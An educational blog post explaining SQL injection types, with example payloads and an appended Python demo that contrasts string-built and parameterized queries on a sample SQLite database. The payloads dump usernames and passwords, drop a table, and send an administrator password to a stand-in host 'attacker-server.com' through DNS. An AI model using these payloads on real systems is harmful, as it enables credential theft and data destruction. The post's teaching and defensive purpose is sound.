
Understanding SQL Injection: Types, Techniques, and Exploits
Sep 12, 2024
SQL injection (SQLi) is a critical web vulnerability that allows attackers to manipulate the queries an application sends to its database. By exploiting SQLi, attackers can interfere with an application’s database to retrieve, modify, or delete sensitive information. This post will explore various types of SQL injection attacks and how they function.

In-Band/Classic SQL Injection
In-Band SQL Injection is the most common form of SQLi, where attackers use the same communication channel to both initiate the attack and retrieve results. Two major methods for this type of SQLi are Union-Based SQLi and Error-Based SQLi.
1. Union-Based SQL Injection
Union-based SQL injection exploits the UNION SQL operator, which combines the result sets of two or more SELECT statements into a single response. By appending a SELECT of their own, attackers can return rows from other tables in the database alongside the results of the original query.
Key Requirements:
The individual SELECT queries must return the same number of columns.
Data types in each column must be compatible across the combined results.
Example of a UNION attack:
' UNION SELECT username, password FROM users--
Retrieving multiple values within a single column:
' UNION SELECT username || '~' || password FROM users--
Example of querying database type/version:
MySQL/Microsoft SQL Server:
' UNION SELECT @@version--
Oracle:
' UNION SELECT * FROM v$version--
2. Error-Based SQL Injection
Error-based SQL injection exploits the error messages returned by the database. By inducing specific errors whose text includes the result of a subquery, attackers can extract sensitive data through the error message itself, so information that would otherwise only be available via blind techniques becomes directly visible.
Techniques:
Triggering error messages by making the database perform impossible actions, like dividing by zero or using invalid type casting.
Example of inducing an error to retrieve data:
CAST((SELECT password FROM users) AS int)--
Blind SQL Injection
Blind SQL Injection occurs when the application is vulnerable, but does not reveal query results or error messages in the HTTP response. Instead, attackers infer data based on true or false responses, making it slower but still dangerous.
1. Boolean-Based Blind SQL Injection
Boolean-based blind SQLi relies on injecting a condition and observing that the application responds differently (for example, with or without a particular string in the page) depending on whether that condition evaluates to true or false.
Examples:
True condition:
TrackingId='xyz' AND '1'='1--
False condition:
TrackingId='xyz' AND '1'='2--
Attackers use these responses to infer data about the database. For example, extracting the first character of an admin password:
TrackingId='xyz' AND SUBSTRING((SELECT password FROM users WHERE username = 'Administrator'), 1, 1) = 'a'--
2. Time-Based Blind SQL Injection
In time-based blind SQLi, attackers rely on database time delays to extract information. A response delay indicates that the condition is true.
Example:
'; IF (1=1) WAITFOR DELAY '0:0:10'--
In this case, the server waits for 10 seconds before responding if the condition is true. The delay confirms to the attacker that the injected SQL was executed, and the same pattern can then be used with a condition that tests data values, one bit of information per request.
Out-of-Band (OAST) SQL Injection
Out-of-Band SQL Injection (OAST) uses a separate network channel to retrieve data rather than the application's HTTP response. It is used when in-band techniques are not viable, for instance when the application returns neither query results nor error messages and the query runs asynchronously so that timing cannot be observed. OAST typically exfiltrates data through DNS or HTTP requests made by the database server to a host the attacker controls.
Example:
'; exec master..xp_dirtree '//attacker-server.com/a'--
Another example that exfiltrates data through DNS queries:
'; declare @p varchar(1024); set @p=(SELECT password FROM users WHERE username='Administrator'); exec('master..xp_dirtree "//'+@p+'.attacker-server.com/a"')--
Second-Order SQL Injection
Second-Order SQL Injection occurs when an attacker inputs malicious SQL that is stored and later executed by the application. Unlike classic SQLi, the attack is not immediate. Instead, it targets scenarios where the injected code is triggered during subsequent operations.
For example, an attacker might inject malicious input during registration, and the application later executes this input when performing administrative tasks.
Example:
username='admin'; DROP TABLE users; --
Here, if this input is stored and later used in a different context (e.g., a database update), the malicious SQL executes, potentially deleting the users table.
Conclusion
SQL injection attacks remain one of the most severe and common web vulnerabilities. Understanding the various forms of SQL injection, including classic in-band methods (union-based and error-based), blind SQLi, out-of-band SQLi, and second-order SQLi, is crucial for securing applications against these threats. Each technique exploits different aspects of how databases process input, making it essential for developers to implement proper input validation, prepared statements, and parameterized queries to prevent SQLi attacks.
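To make the conclusion's point about parameterized queries concrete, here is an added example (not from the original post) run against a constructed in-memory SQLite database. It feeds the UNION payload from the in-band section to a string-built query and to a parameterized one, and then replays the second-order pattern: a stored username is later concatenated into an UPDATE. The users table, its columns and all function names are assumptions made for this example.

```python
import sqlite3

def make_db():
    # Constructed sample schema and rows for the demonstration (not from the post).
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (username TEXT, password TEXT, active INTEGER DEFAULT 1);
        INSERT INTO users (username, password) VALUES ('alice', 'pw1'), ('Administrator', 's3cret');
    """)
    return conn

def lookup_unsafe(conn, username):
    # Query text assembled from untrusted input: the pattern that enables in-band SQLi.
    sql = "SELECT username, password FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchall()

def lookup_safe(conn, username):
    # Parameterized query: the driver binds the value, so it is never parsed as SQL.
    sql = "SELECT username, password FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()

def register(conn, username):
    # The registration step itself is parameterized, so the payload is stored intact.
    conn.execute("INSERT INTO users (username, password) VALUES (?, ?)", (username, "x"))

def deactivate(conn, username, safe):
    # Second-order: a later job reads the stored name back and reuses it in another query.
    stored = conn.execute("SELECT username FROM users WHERE username = ?", (username,)).fetchone()[0]
    if safe:
        cur = conn.execute("UPDATE users SET active = 0 WHERE username = ?", (stored,))
    else:
        cur = conn.execute("UPDATE users SET active = 0 WHERE username = '" + stored + "'")
    return cur.rowcount  # number of rows the UPDATE touched

def demo():
    union_payload = "' UNION SELECT username, password FROM users--"
    union_unsafe = len(lookup_unsafe(make_db(), union_payload))  # leaks every row
    union_safe = len(lookup_safe(make_db(), union_payload))      # no such literal username
    stored_payload = "x' OR '1'='1"  # tautology stored at registration time
    results = {}
    for safe in (False, True):
        conn = make_db()
        register(conn, stored_payload)
        results[safe] = deactivate(conn, stored_payload, safe)  # 3 rows unsafe, 1 row safe
    return union_unsafe, union_safe, results[False], results[True]

if __name__ == "__main__":
    print(demo())
```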